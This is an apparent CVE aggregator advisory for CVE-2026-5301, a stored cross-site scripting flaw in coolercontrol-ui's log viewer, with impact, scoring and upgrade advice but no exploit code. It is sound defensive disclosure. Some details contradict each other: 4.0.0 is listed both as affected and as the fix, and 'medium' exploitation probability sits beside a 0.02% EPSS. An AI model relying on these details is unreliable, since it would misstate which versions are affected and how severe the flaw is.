Platform
vue
Component
coolercontrol-ui
Fixed in
4.0.0
CVE-2026-5301 describes a stored Cross-Site Scripting (XSS) vulnerability discovered in coolercontrol-ui, a Vue.js-based user interface. This vulnerability allows unauthenticated attackers to inject malicious JavaScript code into the system through poisoned log entries, potentially leading to account takeover and other malicious actions. The vulnerability impacts versions 2.0.0 through 4.0.0 of coolercontrol-ui, and a fix is available in version 4.0.0.
The impact of this XSS vulnerability is significant. An attacker can inject arbitrary JavaScript code into the log viewer, which will be executed in the context of the user's browser. This allows the attacker to steal session cookies, redirect users to malicious websites, deface the application, or even execute arbitrary code on the server if the user has sufficient privileges. The attack surface is broad, as any unauthenticated user can potentially inject malicious log entries. Successful exploitation could lead to complete compromise of the coolercontrol-ui instance and potentially the underlying system if the UI is integrated with other critical services.
CVE-2026-5301 was publicly disclosed on 2026-04-08. No public proof-of-concept (POC) code has been released at the time of writing, but the vulnerability's nature makes it likely that a POC will emerge. The vulnerability is not currently listed on the CISA KEV catalog. The ease of exploitation, combined with the potential impact, suggests a medium probability of exploitation.
Exploit Status
EPSS
0.02% (6% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2026-5301 is to upgrade to version 4.0.0 of coolercontrol-ui, which contains the fix. If upgrading immediately is not possible, consider implementing input sanitization and output encoding on all user-supplied data displayed in the log viewer. Specifically, ensure that all log entries are properly escaped before being rendered in the browser. Web Application Firewalls (WAFs) configured to detect and block XSS payloads can also provide a temporary layer of protection. Review and harden the application's security configuration to minimize the attack surface.
Update to version 4.0.0 or higher to mitigate the XSS vulnerability. This update corrects the improper neutralization of input during web page generation, preventing the injection of malicious JavaScript code in log entries.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2026-5301 is a stored Cross-Site Scripting (XSS) vulnerability in coolercontrol-ui versions 2.0.0–4.0.0 that allows attackers to inject malicious JavaScript via poisoned log entries.
You are affected if you are running coolercontrol-ui versions 2.0.0 through 4.0.0 and have not yet upgraded to version 4.0.0.
Upgrade to version 4.0.0 of coolercontrol-ui. As a temporary mitigation, implement input sanitization and output encoding on all user-supplied data displayed in the log viewer.
While no active exploitation has been confirmed, the vulnerability's nature makes it likely that it will be exploited, and a POC is expected to be released.
Refer to the coolercontrol-ui project's repository or website for the official advisory and release notes regarding CVE-2026-5301.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.